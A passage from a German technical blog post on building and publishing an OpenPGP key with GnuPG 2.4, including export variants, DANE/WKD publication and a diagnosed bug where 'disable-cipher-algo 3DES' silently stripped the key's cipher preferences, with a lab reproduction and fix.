                                                                              Danach importierst du die aktualisierte öffentliche Hälfte in den Alltags-Keyring und rollst sie über alle Veröffentlichungskanäle aus. Das ist unbequem. Es soll unbequem sein, denn genau diese Unbequemlichkeit ist der Grund, warum der Hauptschlüssel selten angefasst wird und deshalb schwer zu verlieren ist.

                                                                              Den alten Schlüssel den neuen gegenzeichnen lassen

                                                                              Ein weicher Übergang statt einer harten Kante: Der alte Schlüssel bleibt bis zu seinem Ablauf gültig und zertifiziert den neuen. Wer dem alten Schlüssel schon vertraut, bekommt damit einen kryptografischen Pfad zum neuen, ohne mich irgendwo anrufen zu müssen.

                                                                              gpg --default-key 0x5F279C362EEAB216 --sign-key $FPR

                                                                              Die externe Zertifizierung über Governikus

                                                                              Das ist ein eigenes Thema, deshalb hier nur zusammengefasst: Governikus ist nach meinem Stand vom August 2026 der einzige mir bekannte noch aktive Dienst in Deutschland, der OpenPGP-Schlüssel über die Online-Ausweisfunktion zertifiziert. Du schickst deinen öffentlichen Schlüssel hin, weist dich mit dem Personalausweis aus und bekommst eine Zertifizierung mit Level 3 zurück. Die Volksverschlüsselung fällt als Alternative aus, die macht ausschließlich S/MIME nach X.509, erzeugt die Schlüssel selbst und wird ohnehin eingestellt.

                                                                              Strukturell wichtig für den Rest des Beitrags ist nur ein Punkt: Diese Zertifizierung ist eine Fremdsignatur. Und die Hälfte meiner Veröffentlichungskanäle wirft Fremdsignaturen weg. Warum, steht gleich.

                                                                              Vier Exporte für vier Aufgaben

                                                                              Das ist der Teil, den fast alle Anleitungen überspringen, und ausgerechnet hier fallen die echten Entscheidungen. Vier verschiedene Exporte desselben Schlüssels für vier verschiedene Jobs, mit den gemessenen Größen der Artefakte, die tatsächlich ausgeliefert werden:

                                                                              Artefakt

                                                                              Befehl

                                                                              Größe

                                                                              Inhalt

                                                                              minimal, ASCII

                                                                              gpg --armor --export $FPR

                                                                              16772 B

                                                                              1 UID plus Foto, 3 Unterschlüssel, 5 Signaturen

                                                                              vollständig, ASCII

                                                                              gpg --armor --export-options no-export-minimal --export $FPR

                                                                              17833 B

                                                                              zusätzlich 3 Fremdsignaturen, also 8 Signaturen

                                                                              WKD, binär

                                                                              gpg --no-armor --export-options no-export-minimal --export $FPR

                                                                              13108 B

                                                                              wie vollständig, nur binär

                                                                              DANE, binär minimal

                                                                              siehe unten

                                                                              1298 B

                                                                              1 UID, kein Foto, 4 Signaturen

                                                                              Alle vier Befehle habe ich gegen die live ausgelieferten Dateien geprüft, sie reproduzieren die Artefakte byteidentisch, sha256 stimmt jeweils überein. Du kannst sie also so übernehmen.

                                                                              Und jetzt die fiese Falle. In meiner gpg.conf steht global export-options export-minimal. Export-Optionen summieren sich, sie ersetzen einander nicht. --export-options export-clean hebt export-minimal also nicht auf. Du bekommst weiterhin einen minimalen Export, still und ohne Warnung, mit weggeworfenen Fremdsignaturen. Nur die ausdrückliche Verneinung funktioniert:

                                                                              gpg --export-options export-clean      --export $FPR | gpg --list-packets | grep -c '^:signature packet:'   # 5, immer noch minimal
                                                                              gpg --export-options no-export-minimal --export $FPR | gpg --list-packets | grep -c '^:signature packet:'   # 8, korrekt

                                                                              Das ist genau die Sorte Fehler, bei der du fest davon überzeugt bist, einen Schlüssel mit allen Signaturen veröffentlicht zu haben, während in Wahrheit die eID-Zertifizierung nie das Haus verlassen hat.

                                                                              Die zweite Stolperfalle beim Export: export-minimal wirft zwar Fremdsignaturen weg, behält aber die Foto-UID. Für den DANE-Record muss auch das Bild raus, sonst wächst der Record von rund einem Kilobyte auf gute zwölf. Dieser Befehl hat den ausgelieferten Record mit 1298 Byte erzeugt:

                                                                              gpg --no-armor --export-options export-minimal --export-filter keep-uid='mbox = kernel-error@kernel-error.com' --export $FPR > openpgpkey.bin

                                                                              Zwei Anmerkungen noch zu den Formaten, weil sich in der 2.4er Reihe etwas geändert hat:

                                                                              • --print-dane-records gibt es nicht mehr. Der Nachfolger heißt --export-options export-dane.
                                                                              • Verwechsle die beiden Ausgaben aber nicht. export-dane liefert einen fertigen DNS-Präsentationsblock, also $ORIGIN, Kommentarzeilen und generische TYPE61-Rdata, bei mir 25642 Byte. Das ist kein binäres Schlüsselmaterial. Zum Lesen ist es praktisch, der ausgelieferte Record entstand aber aus dem binären Export oben plus base64 -w0 openpgpkey.bin. Beide Wege sind gültige Zonefile-Syntax, RFC 7929 definiert die base64-Präsentationsform und RFC 3597 die generische TYPE61-Form, BIND frisst beides. Der Einzeiler passte einfach besser in meine bestehende Zone.

                                                                              Wo der Schlüssel liegt, und warum genau dort

                                                                              Sieben Kanäle, und jeder existiert aus einem anderen Grund. Das „warum“ ist dabei die interessantere Hälfte:

                                                                              Kanal

                                                                              Format

                                                                              Warum dieser Kanal

                                                                              keys.openpgp.org

                                                                              voll hochgeladen, Server wirft Signaturen und Foto weg

                                                                              der einzige Keyserver, der die Mailadresse validiert, und der, den moderne Clients abfragen

                                                                              keyserver.ubuntu.com

                                                                              voll

                                                                              klassischer SKS-Nachfolger, behält Fremdsignaturen

                                                                              pgpkeys.eu

                                                                              voll

                                                                              zweiter Klassiker, Redundanz

                                                                              DANE / OPENPGPKEY

                                                                              minimal binär, 1298 B

                                                                              Vertrauen hängt an DNSSEC statt an einem Signaturgraphen, muss klein bleiben, es ist ein DNS-Record

                                                                              WKD advanced

                                                                              kein eigener Export, CNAME auf wkd.keys.openpgp.org

                                                                              spiegelt keys.openpgp.org automatisch, lässt sich hier nicht selbst hosten

                                                                              WKD direct (Apex)

                                                                              voll binär, 13108 B

                                                                              selbst gehostet, deshalb die einzige Stelle mit Foto und Fremdsignaturen

                                                                              security.txt und Direktdownload

                                                                              voll ASCII, 17833 B

                                                                              auffindbar für Menschen und für Scanner

                                                                              Zwei abgeleitete Namen tauchen dabei auf, und die werden regelmäßig falsch gebildet. Beide habe ich unabhängig nachgerechnet, sie stimmen mit dem überein, was ausgeliefert wird:

                                                                              # WKD: z-base32 des SHA-1 vom lokalen Teil, ASCII-Großbuchstaben vorher klein gemacht
                                                                              #   sha1("kernel-error") -> z-base32 -> 3gyjbxx9xfdggpkmx5qdd793xy431w5u
                                                                              gpg --with-wkd-hash -k kernel-error@kernel-error.com
                                                                              
                                                                              # DANE (RFC 7929): SHA-256 des kanonisierten UTF-8-Lokalteils, auf 28 Oktette gekürzt,
                                                                              # hex-kodiert, dann ._openpgpkey.<domain>
                                                                              #   70e1c7d87e825b3aba45e2a478025ea0d91d298038436abde5a4c2d0._openpgpkey.kernel-error.com

                                                                              Zwei Präzisierungen, damit hier keine Regel steht, die breiter ist als die Spezifikationen: WKD bildet ASCII-Großbuchstaben auf Kleinbuchstaben ab, das ist kein allgemeines Unicode-Lowercasing. Und DANE übernimmt diese Abbildung nicht einfach, RFC 7929 hat seine eigene Kanonisierung des lokalen Teils. Bei mir fallen beide zusammen, weil kernel-error schon reines Kleinbuchstaben-ASCII ist. Genau deshalb ist mir der Unterschied nie begegnet. Wer einen Lokalteil mit Großbuchstaben oder Nicht-ASCII hat, darf die beiden auf keinen Fall gleichsetzen.

                                                                              Und weil ich schon dabei bin, mich zu blamieren: Bei einem früheren Review habe ich DANE als „fehlt“ markiert, weil ich den z-base32-Namen aus WKD gegen das DNS geprüft habe. Also den falschen Namen. DANE lief die ganze Zeit. Wenn du deinen eigenen Aufbau prüfst, prüfe bitte den Namen, den die jeweilige Spezifikation vorschreibt, und nicht den, den du gerade im Kopf hast. Wie man einen OPENPGPKEY-Record überhaupt in die Zone bekommt und wie man die Zone dafür mit BIND signiert, steht hier im Blog.

                                                                              Eine Konsequenz aus der Tabelle überrascht die Leute regelmäßig, deshalb schreibe ich sie deutlich hin:

                                                                              Die Governikus-Zertifizierung ist nur auf den klassischen Keyservern und auf den selbst gehosteten Kopien sichtbar. keys.openpgp.org wirft sie weg, und gpg bevorzugt die WKD-advanced-Methode, die wiederum auf keys.openpgp.org zeigt. Der Kanal, den die meisten Clients benutzen, ist also ausgerechnet der mit den wenigsten Signaturen.

                                                                              Prüfen wie ein Fremder

                                                                              Der letzte Schritt in Teil A, und der wichtigste: Hol dir deinen eigenen Schlüssel so, wie es jemand tut, der dich nicht kennt. Einmal pro Suchpfad, jedes Mal in einem frischen Schlüsselbund.

                                                                              # den Schlüssel holen wie ein Fremder, einmal pro Lookup-Pfad
                                                                              for m in dane wkd keyserver; do
                                                                                GNUPGHOME=$(mktemp -d) gpg --auto-key-locate clear,$m --locate-external-keys kernel-error@kernel-error.com
                                                                              done
                                                                              
                                                                              # welche Präferenzen bewirbt der Schlüssel tatsächlich?
                                                                              gpg --export $FPR | gpg --list-packets | grep -E 'pref-|features'
                                                                              
                                                                              # welchen Cipher wählt ein Absender wirklich?
                                                                              gpg --status-fd 1 -d message.gpg | grep DECRYPTION_INFO

                                                                              Damit endet das Rezept. Ab hier geht es darum, was die Teile bedeuten, und um die Frage, wie sicher der Aufbau am Ende wirklich ist.

                                                                              Teil B: was das alles bedeutet

                                                                              Wenn du bis hierher gekommen bist, hast du ein funktionierendes Rezept. Was du noch nicht hast, ist ein Gefühl dafür, warum die Teile so und nicht anders geschnitten sind, und wo der Aufbau trotz allem nachgibt. Genau darum geht es jetzt, und zwar in dieser Reihenfolge: erst die Struktur, dann die Zahlen, dann der Fehler und am Ende die Rechnung ohne Schönfärberei.

                                                                              Warum ein Hauptschlüssel, der nur zertifiziert

                                                                              Der Hauptschlüssel hat genau eine Aufgabe: zu sagen, wer zu diesem Schlüssel gehört. Er signiert die UIDs und er signiert die Unterschlüssel. Er signiert nie eine Mail und entschlüsselt nie irgendetwas. Alles Operative ist delegiert:

                                                                              [C] certify   Identitätsanker. Wird selten benutzt. Eine Kompromittierung ist
                                                                                            nicht reparierbar, ein Verlust nur über das Offline-Backup.
                                                                              [S] sign      Signieren im Alltag
                                                                              [E] encrypt   Entschlüsseln im Alltag
                                                                              [A] auth      Authentisierung, etwa als SSH-Schlüssel

                                                                              Der Gewinn: Ein kompromittierter oder ausgedienter Unterschlüssel lässt sich widerrufen und ersetzen, ohne die Identität anzufassen, ohne die gesammelten Fremdsignaturen zu verlieren und ohne den Fingerabdruck zu ändern, der an sieben Stellen veröffentlicht ist. Dass [S] und [E] getrennt sind, hat noch einen zweiten Grund: Sie haben unterschiedliche Lebenszyklen. Einen alten Signaturschlüssel zu vernichten ist harmlos. Einen alten Verschlüsselungsschlüssel zu vernichten heißt, dass du an dein Archiv nicht mehr herankommst.

                                                                              Das Ganze zahlt sich allerdings nur aus, wenn du auch die Konsequenz ziehst: Der volle Nutzen dieser Aufteilung stellt sich erst ein, wenn der Hauptschlüssel offline liegt. Genau deshalb liegt er hier offline, auf verschlüsseltem Wechselmedium und zusammen mit dem Widerrufszertifikat. Er kommt nur heraus, wenn ein Unterschlüssel verlängert, ersetzt oder widerrufen werden muss, und dann in ein temporäres GNUPGHOME und nicht zurück in den Alltags-Keyring. Auf der Arbeitsmaschine liegen ausschließlich die drei Unterschlüssel. Ein Hauptschlüssel, der nur zertifiziert, aber trotzdem neben dem Mailclient herumliegt, ist am Ende nur Kosmetik.

                                                                              Der [A]-Unterschlüssel existiert übrigens, ist aber bewusst nicht im gpg-agent für SSH verdrahtet, sshcontrol ist leer. Ich habe ihn erzeugt, um mir die Option offenzuhalten. Mehr ist es im Moment nicht.

                                                                              Ed25519 und X25519, was die Zahlen bedeuten

                                                                              • Ed25519 zum Signieren und X25519, in GnuPG als cv25519 bezeichnet, zum Verschlüsseln liegen beide bei rund 128 Bit klassischem Sicherheitsniveau. Das ist vergleichbar mit RSA-3072 und deutlich oberhalb von RSA-2048.
                                                                              • Sie sind dramatisch kleiner und schneller. Deshalb passt der komplette Schlüssel mit drei Unterschlüsseln, Foto und drei Fremdsignaturen immer noch in 13 KB.
                                                                              • Curve25519 ist fehlbedienungsresistent entworfen: keine Parameter, die man falsch wählen kann, keine Invalid-Curve-Fallen, deterministische Nonces bei Ed25519. Ein großer Teil der historischen Signatur-Unfälle in der Praxis kam aus genau den Ecken, die diese Kurve wegräumt.

                                                                              Ein Punkt dazu, den du im Kopf behalten solltest, weil er gleich noch wichtig wird: 128 Bit klassische Sicherheit sind die Obergrenze dieses Schlüssels. Merk dir die Zahl. Sie ist der Grund, warum die AES-Geschichte weiter unten weniger dramatisch ist, als sie zunächst klingt.

                                                                              Algorithmen-Präferenzen: was sie sind und wer sie liest

                                                                              Dieses Konzept muss sitzen, sonst funktioniert die Geschichte danach nicht. Vorweg ein Satz, den viele nie gehört haben: Eine OpenPGP-Nachricht ist immer hybrid. Der asymmetrische Teil, also dein Ed25519- und X25519-Material, verpackt ausschließlich einen zufällig erzeugten symmetrischen Sitzungsschlüssel. Die eigentlichen Nutzdaten verschlüsselt ein symmetrisches Verfahren, in der Regel AES. Der Fehler, um den es gleich geht, saß in dieser symmetrischen Hälfte.

                                                                              Ein OpenPGP-Schlüssel trägt nämlich nicht nur öffentliche Schlüssel spazieren. Die Selbstsignatur jeder UID enthält Subpakete, die ankündigen, was der Besitzer verarbeiten kann:

                                                                              hashed subpkt 11 (pref-sym-algos:  9 8 7)      AES256, AES192, AES128
                                                                              hashed subpkt 21 (pref-hash-algos: 10 9 8)     SHA512, SHA384, SHA256
                                                                              hashed subpkt 22 (pref-zip-algos:  2 3 1 0)    ZLIB, BZIP2, ZIP, unkomprimiert
                                                                              hashed subpkt 34 (pref-aead-algos: 2)          OCB, fehlt auf diesem Schlüssel
                                                                              hashed subpkt 30 (features: 05)                Feature-Bits, siehe unten
                                                                              hashed subpkt 23 (keyserver preferences: 80)   "no-modify"

                                                                              Das features-Oktett ist die Stelle, an der ich mich in meinen eigenen Notizen vertan hatte, deshalb hier die Dekodierung. In der Linie, die GnuPG 2.4 implementiert, bedeuten die Bits des ersten Oktetts:

                                                                              0x01  SEIPD-v1 mit Modification Detection Code (MDC)
                                                                              0x02  AEAD
                                                                              0x04  Unterstützung für das v5-Schlüssel- und Fingerabdruckformat

                                                                              features 05 ist also 0x01 + 0x04, das heißt MDC und kein AEAD. features 07 wäre 0x01 + 0x02 + 0x04, und genau das bekommt ein Schlüssel, den GnuPG 2.4 mit Standardeinstellungen erzeugt. Der kaputte Zustand war features 04, also 0x04 ganz allein: weder MDC noch AEAD angekündigt.

                                                                              Eine Versionsfußnote gehört dazu: Diese Bitbelegung und das Subpaket 34 stammen aus der LibrePGP-Linie, die GnuPG 2.4 umsetzt. RFC 9580 hat beides geändert, dort sind die AEAD-Präferenzen in Subpaket 39 umgezogen und das Feature-Modell wurde umgebaut. Diese Spaltung kommt weiter unten noch einmal zurück.

                                                                              Wenn dir jemand etwas verschlüsselt, liest dessen GnuPG deine Präferenzliste und wählt daraus das stärkste Verfahren, das beide können. Das ist der ganze Mechanismus. Daraus folgen zwei Dinge, die den meisten Leuten gegen den Strich gehen:

                                                                              • Deine eigenen personal-cipher-preferences schützen dich nicht. Die bestimmen, was du verschickst. Was Leute dir schicken, bestimmt allein das, was dein veröffentlichter Schlüssel ankündigt.
                                                                              • Die Präferenzen stehen in einer Signatur. Sie zu ändern heißt, die Selbstsignatur neu auszustellen. Und damit ist jede veröffentlichte Kopie deines Schlüssels veraltet, bis du sie erneuerst. Bei mir sind das sieben Kanäle und eine Änderung an der DNS-Zone.

                                                                              Und wenn ein Schlüssel gar nichts ankündigt? Dann greift der Rückfall. RFC 4880 schreibt dafür 3DES vor, den verpflichtend zu implementierenden Algorithmus. Moderne GnuPG-Versionen landen dort allerdings nicht mehr: Seit der 2.3er Reihe verschlüsselt gpg grundsätzlich nicht mehr mit 64-Bit-Blockchiffren, dafür müsstest du ausdrücklich --allow-old-cipher-algos setzen. Der Rückfall endet deshalb bei AES-128. Nicht kaputt, aber eben auch nicht das, was der Schlüssel bekommen sollte.

                                                                              Der Defekt, gemessen

                                                                              Ein x-beliebiger Absender, der meinem brandneuen Schlüssel etwas verschlüsselt, sah das hier:

                                                                              gpg: WARNING: cipher algorithm AES not found in recipient preferences
                                                                              gpg: AES.CFB encrypted data
                                                                              [GNUPG:] DECRYPTION_INFO 2 7 0        # 7 = AES128

                                                                              Derselbe Absender, wenn er dem Schlüssel von 2023 schreibt, den der neue gerade ablöst:

                                                                              [GNUPG:] DECRYPTION_INFO 2 9 0        # 9 = AES256

                                                                              Der neue Schlüssel hatte überhaupt keine pref-sym-algos, keine pref-hash-algos und keine pref-zip-algos, dazu features 04 statt 05. Er wurde also schwächer angesprochen als sein Vorgänger, lautlos, und der einzige Hinweis darauf erschien auf einem Terminal, das jemand anderem gehört.

                                                                              Die Ursache, und eine Korrektur an mir selbst

                                                                              In meinen Arbeitsnotizen stand als Ursache: „mit einer --batch --gen-key-Parameterdatei ohne Preferences:-Zeile gebaut“. Das ist falsch. Eine Parameterdatei ohne diese Zeile erzeugt völlig ordentliche Präferenzen aus den eingebauten Defaults von GnuPG. Nachgeprüft, es kommt das hier heraus:

                                                                              pref-sym-algos: 9 8 7 2 · pref-aead-algos: 2 · pref-hash-algos: 10 9 8 11 2 · features: 07

                                                                              Die echte Ursache saß in der gpg.conf. Ich habe die Juli-Konfiguration in einem Wegwerf-Schlüsselbund nachgestellt, der Defekt war sofort wieder da. Danach habe ich die Datei halbiert, bis eine einzige Zeile übrig blieb:

                                                                              Konfiguration im Test

                                                                              Ergebnis

                                                                              Juli-gpg.conf, unverändert

                                                                              features: 04, gar keine pref-*

                                                                              ohne disable-cipher-algo 3DES

                                                                              pref-sym-algos: 9 8 7 2, features: 07

                                                                              ohne alle disable-cipher-algo-Zeilen

                                                                              pref-sym-algos: 9 8 7 2, features: 07

                                                                              ohne cipher-algo AES256

                                                                              weiterhin kaputt, features: 04

                                                                              nur disable-cipher-algo 3DES vorhanden

                                                                              kaputt, features: 04

                                                                              disable-cipher-algo 3DES plus explizite Preferences:-Zeile

                                                                              sauber, pref-sym-algos: 9 8 7, features: 05

                                                                              disable-cipher-algo 3DES ist also notwendig und hinreichend, um den Defekt auszulösen. Eine Zeile, mehr nicht.

                                                                              Der Mechanismus dahinter ist die eigentliche Pointe des ganzen Beitrags. 3DES ist in OpenPGP der verpflichtend zu implementierende Algorithmus, und in der Standardliste steht er auch sichtbar drin: pref-sym-algos: 9 8 7 2 endet auf der 2, und die 2 ist 3DES. Nimmst du GnuPG diesen einen Algorithmus lokal weg, verschwindet nicht nur er aus der Liste, sondern die Liste als Ganzes.

                                                                              Beim Warum bleibe ich vorsichtig. Dass GnuPG intern keine gültige Liste mehr konstruieren kann und deshalb gar keine schreibt, ist die naheliegende Erklärung, beweisen lässt sie sich von der Kommandozeile aus nicht. Belegt ist der Auslöser, nicht der Code-Pfad dahinter. Der Effekt selbst ist dagegen eindeutig: Die Härtungszeile hat nicht einen schwachen Algorithmus aus der Liste entfernt, sie hat die komplette Liste entfernt. Und damit dafür gesorgt, dass Absender zurückfallen, und zwar auf etwas Schwächeres als das, was ich gerade weghärten wollte.

                                                                              Das Labor zum Selbernachbauen

                                                                              Zwei Minuten, kein echter Schlüssel wird angefasst, alles passiert in Wegwerf-Verzeichnissen unter /tmp. Wenn du mir nicht glaubst, ist das hier der schnellste Weg, es selbst zu sehen:

                                                                              SP=$(mktemp -d)
                                                                              mk() {  # $1 = Name, $2 = bad|good
                                                                                export GNUPGHOME="$SP/$1"; mkdir -p "$GNUPGHOME"; chmod 700 "$GNUPGHOME"
                                                                                [ "$2" = bad ] && echo "disable-cipher-algo 3DES" > "$GNUPGHOME/gpg.conf"
                                                                                cat > "$SP/p.txt" <<EOF
                                                                              Key-Type: eddsa
                                                                              Key-Curve: Ed25519
                                                                              Key-Usage: sign
                                                                              Subkey-Type: ecdh
                                                                              Subkey-Curve: cv25519
                                                                              Subkey-Usage: encrypt
                                                                              Name-Real: Demo $1
                                                                              Name-Email: $1@example.invalid
                                                                              Expire-Date: 1y
                                                                              %no-protection
                                                                              %commit
                                                                              EOF
                                                                                gpg --batch --gen-key "$SP/p.txt" 2>/dev/null
                                                                                gpg --export -a "$1@example.invalid" > "$SP/$1.asc"
                                                                              }
                                                                              mk nopref bad
                                                                              mk withpref good
                                                                              
                                                                              export GNUPGHOME="$SP/sender"; mkdir -p "$GNUPGHOME"; chmod 700 "$GNUPGHOME"
                                                                              echo "auto-key-locate local" > "$GNUPGHOME/gpg.conf"
                                                                              gpg -q --import "$SP"/*.asc
                                                                              echo hi > "$SP/m.txt"
                                                                              for r in nopref withpref; do
                                                                                gpg --trust-model always --yes -e -r "$r@example.invalid" -o "$SP/$r.gpg" "$SP/m.txt"
                                                                                printf '%-9s ' "$r:"
                                                                                GNUPGHOME="$SP/$r" gpg -q -d "$SP/$r.gpg" 2>&1 | grep -i 'encrypted data'
                                                                              done

                                                                              Bei mir kommt das hier heraus, und die eine Zeile Unterschied ist der ganze Defekt:

                                                                              nopref:   gpg: WARNING: cipher algorithm AES not found in recipient preferences
                                                                                        gpg: AES.CFB encrypted data
                                                                              withpref: gpg: AES256.OCB encrypted data

                                                                              Die Reparatur

                                                                              Der Fix selbst ist unspektakulär, ein einziger Befehl im Editiermodus. Weil setpref die Selbstsignatur neu ausstellt, braucht er den Hauptschlüssel. Das Ganze läuft also einmal im temporären GNUPGHOME von weiter oben, mit dem Offline-Schlüssel und dem aktuellen öffentlichen Stand:

                                                                              gpg --edit-key $FPR
                                                                              > setpref AES256 AES192 AES SHA512 SHA384 SHA256 ZLIB BZIP2 ZIP Uncompressed
                                                                              > y
                                                                              > save

                                                                              Danach steht da pref-sym 9 8 7, pref-hash 10 9 8, pref-zip 2 3 1 0 und features 05. Der Fingerabdruck bleibt unverändert, und die Governikus-Zertifizierung, die Gegensignatur des alten Schlüssels, die Foto-UID und sämtliche Ablaufdaten überleben. Das schreibe ich so ausdrücklich hin, weil viele Leute Angst vor setpref haben und glauben, es beschädige den Schlüssel. Tut es nicht. Was es tut: Es stellt die Selbstsignatur neu aus. Und damit müssen anschließend alle sieben Veröffentlichungskanäle aufgefrischt werden.

                                                                              Zur Sicherheit gleich hinterher: default-preference-list in der gpg.conf festgenagelt, und die disable-cipher-algo-Zeilen sind endgültig raus.

                                                                              Wie schlimm war es wirklich?

                                                                              Hier will ich ehrlich sein statt dramatisch, sonst wird das hier auch nur wieder eine von diesen „ich habe einen Bug gefunden“-Geschichten.

                                                                              AES-128 statt AES-256 ist real, aber überschaubar. AES-128 ist nicht gebrochen, es gibt keinen praktischen Angriff darauf. Und erinnere dich an die Zahl von weiter oben: Der asymmetrische Teil dieses Schlüssels liefert ohnehin rund 128 Bit klassische Sicherheit. Gemessen an der reinen Schlüsselsuche war AES-128 also nicht das schwächste Glied in der Kette, es hat lediglich mit dem Rest gleichgezogen. Über Implementierungsfehler, Seitenkanäle oder Protokollschwächen sagt dieser Vergleich nichts. Die faire Einordnung lautet: Das war ein Hygiene- und Signalisierungsfehler, keine ausnutzbare Schwachstelle. Bemerkenswert ist er, weil er lautlos war, automatisch passierte und von einer Härtungsmaßnahme verursacht wurde.

                                                                              Das fehlende MDC-Bit sah schlimmer aus, als es war. features 04 heißt, dass das Bit 0x01 fehlte, mit dem ein Schlüssel Modification Detection ankündigt. Auf dem Papier lädt das einen Absender dazu ein, auf ein Paket ohne Integritätsschutz zurückzufallen, und das ist die Ecke, aus der EFAIL kam. Gemessen kam aber das hier heraus:

                                                                              [GNUPG:] DECRYPTION_INFO 2 7 0
                                                                              [GNUPG:] GOODMDC

                                                                              Ein Absender mit GnuPG 2.4.x in Standardkonfiguration hat trotz des fehlenden Bits ein integritätsgeschütztes SEIPD-v1-Paket erzeugt und GOODMDC gemeldet. MDC ist dort schlicht immer an. Herauskommen aus dem Integritätsschutz muss man in dieser Version aktiv wollen, etwa über --rfc2440, das ausdrücklich den alten Modus ohne MDC erzeugt. Die tatsächliche Integritätslücke gegenüber einem 2.4.x-Absender mit Standardeinstellungen war damit null.

                                                                              Diese Aussage gilt exakt so weit wie die Messung und keinen Meter weiter. Über andere Implementierungen oder ältere GnuPG-Versionen sagt sie nichts, und genau dort könnte ein fehlendes MDC-Signal im Prinzip sehr wohl noch eine Rolle spielen. „Kein aktueller Absender ist betroffen“ wäre schlicht gelogen, und irgendwer würde es nachprüfen.

                                                                              Was wirklich Alarm verdient, ist keines von beiden für sich, sondern die Art des Versagens. Ein Schlüssel kann strukturell perfekt sein und trotzdem still auf den nackten Rückfallwert heruntergehandelt werden, ohne dass irgendwer etwas davon mitbekommt. Die einzige Diagnose erscheint auf einer Maschine, die dir nicht gehört. Weder gpg --list-keys noch --check-sigs noch irgendeine Keyserver-Seite zeigt dir das. Du musst dir Signatur-Subpakete ansehen, und das macht praktisch niemand.

                                                                              Ein Punkt bleibt offen: AEAD

                                                                              Der reparierte Schlüssel steht bei features 05 und hat keine pref-aead-algos. Gemessen bedeutet das:

                                                                              AES256.CFB encrypted data      # reparierter Schlüssel, features 05
                                                                              AES256.OCB encrypted data      # frisch erzeugter Schlüssel, features 07 plus pref-aead-algos: 2

                                                                              setpref hat das MDC-Bit zurückgeholt, aber nie eine AEAD-Ankündigung ergänzt, weil der Schlüssel aus dem kaputten Zustand heraus repariert und nicht neu erzeugt wurde. Nachrüsten ginge, setpref … OCB liefert pref-aead-algos: 2 und features 07, auch das habe ich geprüft.

                                                                              Ich lasse es trotzdem so. AES256-CFB mit MDC ist solide. Vor allem aber ist AEAD genau die Stelle, an der OpenPGP derzeit auseinanderläuft: Das AEAD von GnuPG 2.4 folgt der LibrePGP-Linie, RFC 9580 spezifiziert eine andere Konstruktion namens SEIPD v2. AEAD auf einem breit veröffentlichten Schlüssel anzukündigen bringt heute eine marginale Verbesserung und ein echtes Interoperabilitätsrisiko. Wer sich für die andere Baustelle im selben Themenfeld interessiert: Was in einem modernen Handshake steckt, habe ich am Beispiel X25519MLKEM768 auseinandergenommen. Dasselbe Argument gilt übrigens für force-ocb in meiner lokalen Konfiguration, das betrifft nur, was ich selbst verschicke, und ist eine bewusst etwas vorwärtsgewandte Entscheidung.

                                                                              Ehrliche Gesamteinschätzung

                                                                              • Die Kryptografie ist in Ordnung. Ed25519, X25519, SHA-512 und AES-256 sind eine moderne, unaufgeregte Auswahl ohne bekannte praktische Schwächen, bei rund 128 Bit klassischer Sicherheit.
                                                                              • Die Struktur ist besser als der Durchschnitt. Hauptschlüssel nur zum Zertifizieren, getrennte Unterschlüssel, begrenzte Laufzeit von fünf Jahren, vorab erzeugtes Widerrufszertifikat und ein Backup, das nachweislich wiederherstellbar ist.
                                                                              • Das schwächste Glied ist kein Algorithmus. Es ist die Tatsache, dass die drei Alltags-Unterschlüssel auf einer dauerhaft laufenden Arbeitsmaschine liegen. Wer diese Maschine und die Passphrase bekommt, erzeugt bis zum Widerruf vollgültige Signaturen in meinem Namen und liest mein Archiv mit. Nach außen ist er also erst einmal ich. Was er nicht bekommt, ist der Identitätsanker: keine neue UID zertifizieren, keinen neuen Unterschlüssel binden, und der Fingerabdruck bleibt meiner. Ein kompromittierter Unterschlüssel fliegt raus und wird ersetzt, die Identität überlebt. Eine Smartcard würde den Rest weiter verkleinern, weil sich Schlüsselmaterial von der Karte nicht kopieren lässt. Sie löst es nicht: Steckt die Karte und ist sie entsperrt, wird eben auf der Karte signiert. Auf der Liste steht sie trotzdem.
                                                                              • Das Vertrauen in die Bindung ist geschichtet, nicht absolut. DNSSEC-signiertes DANE und selbst gehostetes WKD sind stark. Die Governikus-Zertifizierung ist die einzige echte Namens-Bindung. Das klassische Web of Trust trägt praktisch nichts mehr bei, die persönlichen Signaturen auf dieser Identität hängen an einem Schlüssel von 2011.
                                                                              • Post-Quantum: bewusst nicht adressiert. GnuPG 2.4.4 kann kein PQC, und die PQC-Arbeit in OpenPGP steckt noch im Entwurfsstadium mit praktisch keiner Interoperabilität. Curve25519 bietet gegen einen kryptografisch relevanten Quantencomputer keinerlei Widerstand, „heute sammeln, später entschlüsseln“ trifft also auf alles zu, was heute an diesen Schlüssel verschlüsselt wird. Ein hybrider Unterschlüssel lässt sich später ergänzen, ohne den Schlüssel neu zu bauen. Das ist eine der Auszahlungen des Unterschlüssel-Aufbaus von oben.

                                                                              Was man daraus mitnimmt

                                                                              Vier Punkte, und die gelten weit über OpenPGP hinaus:

                                                                              • Härtung kann schwächen. Einen verpflichtenden Basisalgorithmus zu entfernen hat die Verhandlung nicht verengt, sondern zerstört. Bevor du etwas abschaltest, das eine Spezifikation vorschreibt, sieh nach, was die Maschinerie drumherum macht, wenn es fehlt.
                                                                              • Prüfe das Artefakt, nicht den Befehl. gpg --batch --gen-key ist mit Rückgabewert 0 durchgelaufen und hat einen wunderschön aussehenden Schlüssel erzeugt. Sichtbar war der Defekt ausschließlich in --list-packets.
                                                                              • Konfiguration und Schlüssel sind nicht unabhängig. Der Schlüssel hat einen Defekt dauerhaft von der Konfiguration geerbt, die in den fünfzehn Sekunden aktiv war, in denen er entstand.
                                                                              • Manche Defekte sieht man nur von außen. Das Symptom erschien auf dem Terminal des Absenders. Teste deinen eigenen Schlüssel so, wie ein Fremder ihn benutzt. Genau dafür ist die Schleife mit mktemp -d und --locate-external-keys weiter oben da.

                                                                              Und die Kurzfassung für alle, die nur bis hierher gescrollt haben: Ein moderner Schlüssel ist nicht automatisch ein korrekt konfigurierter Schlüssel. Der Unterschied steckt in Signatur-Subpaketen, die dir kein einziges Standardwerkzeug von sich aus zeigt.

                                                                              Siehe auch

                                                                              Wenn du deinen eigenen Schlüssel gerade nachgeprüft hast und dort etwas anderes steht als erwartet, oder wenn ich mich irgendwo irre, dann dürft ihr mich sehr gerne fragen.

                                                                              AodeRelay boosted

                                                                              [?]VibeOps » 🌐
                                                                              @vibeops@techhub.social

                                                                              Bin über gestolpert

                                                                              Mit überflüssig, auch für große Setups durch extra Hermes Instanz machbar

                                                                              KI Agent:

